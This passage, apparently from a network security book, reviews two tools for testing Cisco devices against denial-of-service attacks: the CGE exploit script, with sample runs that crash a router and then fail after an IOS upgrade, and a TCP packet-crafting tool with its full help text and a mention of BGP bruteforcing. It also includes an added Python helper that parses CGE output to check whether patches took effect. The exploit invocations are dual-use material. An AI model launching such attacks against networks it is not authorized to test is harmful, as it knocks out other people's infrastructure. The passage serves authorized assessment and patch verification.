Several tools capable of launching Cisco-centric DoS attacks are freely available for download on the Internet. A vigilant system administrator or penetration tester can use them against her own or a client's network to evaluate its resilience to DoS attacks that crackers could launch. In this section, we review two such tools that are useful for launching a variety of DoS attacks against Cisco boxes.
Cisco Global Exploiter (CGE) is a powerful Perl script that can be used to attack, and thus assess the patch level of, Cisco devices. At the time of writing, it includes built-in information about 14 vulnerabilities. The best part about this tool is that new security flaws are easy to add. With basic knowledge of Perl, you can update and customize the tool's vulnerability database to represent the best testing scenario for the network. This framework can be downloaded from http://www.packetstormsecurity.org/ by searching for cge. The default CGE can exploit the following bugs in Cisco devices:
arhontus $ perl cge.pl
Usage : perl cge.pl <target> <vulnerability number>
Vulnerabilities list :
 - Cisco 677/678 Telnet Buffer Overflow Vulnerability
 - Cisco IOS Router Denial of Service Vulnerability
 - Cisco IOS HTTP Auth Vulnerability
 - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
 - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
 - Cisco 675 Web Administration Denial of Service Vulnerability
 - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
 - Cisco IOS Software HTTP Request Denial of Service Vulnerability
 - Cisco 514 UDP Flood Denial of Service Vulnerability
 - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
 - Cisco Catalyst Memory Leak Vulnerability
 - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
 - 0 Encoding IDS Bypass Vulnerability (UTF)
 - Cisco IOS HTTP Denial of Service Vulnerability
With the successful exploitation of a Cisco device, you should see output similar to this:
arhontus $ perl cge.pl 2611b 2
Packet sent ...
Now checking server's status ...
Vulnerability successful exploited. Target server is down ...
2611b is the name or IP address of the target, and 2 is the vulnerability number; in this particular example it refers to Cisco IOS Router DoS Vulnerability, in which an invalid HTTP request is sent to the router's web management interface.
After upgrading to the latest IOS version, we run the same exploit to check whether the router has been successfully patched for this bug. As you can see, the vulnerability no longer crashes the server:
arhontus $ perl cge.pl 2611b 2
Packet sent ...
Now checking server's status ...
Vulnerability unsuccessful exploited. Target server is still up ...
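The before-and-after retest described above can be recorded mechanically. The following Python helper is an added example, not part of the original text or of CGE: it parses saved cge.pl transcripts in the output format shown here and compares the pre- and post-upgrade runs. The transcripts are constructed, and the function names and status labels are assumptions.

```python
import re

# Constructed transcripts in the output format shown above (not from a real device).
BEFORE = """arhontus $ perl cge.pl 2611b 2
Packet sent ...
Now checking server's status ...
Vulnerability successful exploited. Target server is down ...
"""
AFTER = """arhontus $ perl cge.pl 2611b 2
Packet sent ...
Now checking server's status ...
Vulnerability unsuccessful exploited. Target server is still up ...
"""

RUN = re.compile(r"perl\s+cge\.pl\s+(\S+)\s+(\d+)\s*$")
# CGE's own wording: "successful exploited" / "unsuccessful exploited".
RESULT = re.compile(r"Vulnerability\s+(un)?successful\s+exploited", re.I)

def parse_runs(transcript):
    """Map (target, vuln_number) -> 'vulnerable' | 'resisted' | 'inconclusive'."""
    results, current = {}, None
    for line in transcript.splitlines():
        run = RUN.search(line)
        if run:
            current = (run.group(1), int(run.group(2)))
            results[current] = "inconclusive"  # until a verdict line is seen
        elif current and (verdict := RESULT.search(line)):
            results[current] = "resisted" if verdict.group(1) else "vulnerable"
    return results

def retest_report(before, after):
    """Label each tested flaw by comparing pre- and post-upgrade runs."""
    old, new = parse_runs(before), parse_runs(after)
    report = {}
    for key in sorted(set(old) | set(new)):
        was, now = old.get(key, "not tested"), new.get(key, "not tested")
        if now == "vulnerable":
            report[key] = {"vulnerable": "STILL VULNERABLE",
                           "resisted": "REGRESSED"}.get(was, "VULNERABLE")
        elif now == "resisted":
            report[key] = "FIXED" if was == "vulnerable" else "OK"
        else:
            report[key] = "RETEST NEEDED"  # no verdict line, or never re-run
    return report

if __name__ == "__main__":
    for (target, vuln), status in retest_report(BEFORE, AFTER).items():
        print(f"{target} vuln #{vuln}: {status}")
```

A run whose transcript ends before the verdict line is reported as needing a retest rather than being counted as patched.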
The TCP Test Tool was written by the Cisco development team (Critical Infrastructure Assurance Group, or CIAG) to perform security assessments on Cisco devices. It allows the user to craft and send customized TCP packets with any payload. This tool has inherited many of the ideas of the Nemesis packet-construction project. As the help output below shows, a large number of options are available to the user for building a solid testing environment. The TCP Test Tool (ttt) can be obtained from the Cisco Systems web site or from http://www.packetstormsecurity.org.
arhontus $ ./ttt --help
TCP Test Tool (ttt) Version 1.3
Eloy Paris <firstname.lastname@example.org>
From ideas by Sean Convery <email@example.com> and the NEMESIS Project
Usage: ttt [-h] [options]
General options:
  -h, --help                   display this help and exit
  -c, --count NUM              number of segments to send (default is 1)
  -d, --delay NUM              delay in milliseconds (default is 0)
  --flood NUM                  flood the network by sending NUM packets
TCP options:
  -x, --sport NUM              TCP source port
  -y, --dport NUM              TCP destination port
  -f, --tcpflags               TCP flags
                               -fS SYN, -fA ACK, -fR RST, -fP PSH, -fF FIN, -fU URG
                               (can also use --syn, --ack, --rst, --psh, --fin, and --urg)
  -w, --window NUM             window size
  -s, --sequence NUM           sequence number (^ to increment by window)
  -a, --acknowledgement NUM    acknowledgement number
  -u, --urgent NUM             urgent pointer
  -P, --payload FILE           payload file (use stdin if FILE is '-')
  -5, --md5 SECRET             use TCP MD5 signatures (TCP option 19)
  --mss NUM                    TCP maximum segment size
  --wscale NUM                 window scale option
  --nocksum                    don't compute TCP checksums
IP options:
  -S, --src ADDRESS            source IP address
  -D, --dst ADDRESS            destination IP address
  -I, --id NUM                 IP ID
  -T, --ttl NUM                IP time to live
  -t, --tos NUM                IP type of service
This utility can also be driven from a script to generate random payloads or specific options, for example for BGP bruteforcing, as has been done with tcpsig-crack.pl in the examples directory. An attacker or penetration tester can generate a large number of testing scenarios with this suite, limited only by the user's imagination.